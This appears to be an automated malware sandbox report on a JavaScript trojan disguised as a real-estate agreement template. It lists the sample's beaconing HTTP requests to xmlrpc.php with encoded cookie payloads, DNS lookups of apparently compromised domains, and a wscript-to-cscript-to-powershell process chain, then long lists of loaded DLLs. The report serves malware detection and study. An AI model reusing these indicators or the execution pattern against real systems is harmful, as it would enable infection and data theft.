Source: global traffic HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=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; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNYQpurJIAjB/n2EzrYImkUj5IZneMZD4CmW+4V58Z9fVcXn411+hhHHO+auDwx54gYcjWvHFkMTc8XXLV7r8VvmpvoFPCS6HYABAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: tennoji-law-uranai.comConnection: Close
Source: global traffic HTTP traffic detected: GET /xmlrpc.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Cookie: 1C5A6FBD41=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; 1C5A6FBD411=H4sIAAAAAAAEADVQ0W6DMAz8leUH9g9dxbRKY51KO55RMNRqErt2oEXKxy+QTX7wSb673GXH7NB2ESm8S+fhgzQmYylcC1AryBsQ1bzi4Ckk03damL1zhdk/fDLwZEcCksxAIfYyl9uhd5CM0261qMGTLC978iygiqtdTRelfVa2JLdVfhwGtLDP0W5nOk2ZwvQA0Ss4l8wJRtQoS0ZTiOjhTWiTNdCJve6Yk1GQOVvkB5tR/D9BsSRSv0ZRJnI6Z0rsJNYQpurJIAjB/n2EzrYImkUj5IZneMZD4CmW+4V58Z9fVcXn411+hhHHO+auDwx54gYcjWvHFkMTc8XXLV7r8VvmpvoFPCS6HYABAAA=; 1C5A6FBD412=H4sIAAAAAAAEAO3XTQrCMBCG4atMD6B3KFJ/QOuiUXeFWKYx0GTSNKJCD692I3TlAb7tfA+zf/MQOtvoZMWvo3a8lSHVB9tEGaRNVCWJPGaKn2nnwz3N5u+dpoHy36MxO4XwcvuyKII69vHcGmt6y3XJD1L6SgvaiJiOaXWL4hgeHh4eHh4eHh4eHh4e/j9/sX4q1eWnQuf1+gYoC+W24g4AAA==; 1C5A6FBD413=H4sIAAAAAAAEAF2R246CMBiEX6W+ABHZ7H05lINiW1Aw3iH8Ki5QUkhkEx9+29Wou3f9Zqbt36m5OdcDYs5tZiZQfpcNILvuFDmiG6VoECs6aBQfpRIqGL7UelUfZCFrGG4z639uDeNVSJVaYJ4QL0s2/sq49Ke/wtQMk1LsHY62EaYeNfpOR1xOSZAFm9g32t66zebeVOpjF0HMWLrjjGdGXx3VPeE+JjZZxp6tByKUUdfPaKCiLzAqUU7aDiM3Jcto72v7CQ/7XbnPZbJ8T3lIHLxWwAlmNGeY6N0SigbBMBYjoFIgce1ADue6R8VJArTQjWiEtm+0/2F9Wgvjoloy03XIfMYSj6kzXvAoJstdwpa+uyWPGvI08KLYzbhzr+Fd+H3+HFfiAAiXUhyKUTGpJRyFmn3uC3FSv+icpWjhBwUKP8vfAQAA; 1C5A6FBD414=H4sIAAAAAAAEAHOOMzIwNjE2t7Q0NTCwBABmy3G1DgAAAA==Host: tennoji-law-uranai.comConnection: Close
Source: global traffic DNS traffic detected: DNS query: naturalanimals.net
Source: global traffic DNS traffic detected: DNS query: weissenbach-pr.de
Source: global traffic DNS traffic detected: DNS query: memar98.com
Source: global traffic DNS traffic detected: DNS query: tennoji-law-uranai.com
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 06 May 2024 16:41:41 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 199Connection: closeVary: Accept-Encoding
Source: real estate co ownership agreement template 43632.js String found in binary or memory: http://my.opera.com/emoller/blog/2011/12/20/requestanimationframe-for-smart-er-animating
Source: real estate co ownership agreement template 43632.js String found in binary or memory: http://paulirish.com/2011/requestanimationframe-for-smart-animating/
Source: real estate co ownership agreement template 43632.js String found in binary or memory: http://peltiertech.com/how-excel-calculates-automatic-chart-axis-limits/
Source: real estate co ownership agreement template 43632.js String found in binary or memory: http://raphaeljs.com/analytics.js)
Source: real estate co ownership agreement template 43632.js String found in binary or memory: http://stackoverflow.com/questions/1573053/javascript-function-to-convert-color-names-to-hex-codes
Source: real estate co ownership agreement template 43632.js String found in binary or memory: http://www.cs.rit.edu/~ncs/color/t_convert.html
Source: real estate co ownership agreement template 43632.js String found in binary or memory: http://www.w3schools.com/HTML/html_colornames.asp
Source: real estate co ownership agreement template 43632.js String found in binary or memory: http://www.w3schools.com/svg/svg_path.asp
Source: real estate co ownership agreement template 43632.js String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/SVG/Attribute/d
Source: real estate co ownership agreement template 43632.js String found in binary or memory: https://github.com/miguelmota/base64toblob/blob/master/base64toblob.js
Source: real estate co ownership agreement template 43632.js String found in binary or memory: https://github.com/nhn/tui.chart
Source: real estate co ownership agreement template 43632.js String found in binary or memory: https://github.com/nhn/tui.chart/issues/56)
Source: real estate co ownership agreement template 43632.js String found in binary or memory: https://i-msdn.sec.s-msft.com/dynimg/IC267997.gif
Source: real estate co ownership agreement template 43632.js String found in binary or memory: https://www.google-analytics.com/collect
Source: real estate co ownership agreement template 43632.js String found in binary or memory: https://www.win.tue.nl/~vanwijk/stm.pdf
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown HTTPS traffic detected: 91.198.66.211:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 78.46.3.78:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 195.28.10.122:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 153.127.91.146:443 -> 192.168.2.7:49711 version: TLS 1.2

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}
Source: C:\Windows\System32\wscript.exe Process Stats: CPU usage > 49%
Source: real estate co ownership agreement template 43632.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal92.troj.expl.evad.winJS@13/9@4/4
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\com.adobe.dunamis\Golf Club Repair.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6272:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1100:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fffj2uvs.1yt.ps1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\real estate co ownership agreement template 43632.js"
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE DEVELO~1.JS
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE DEVELO~1.JS
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\cscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
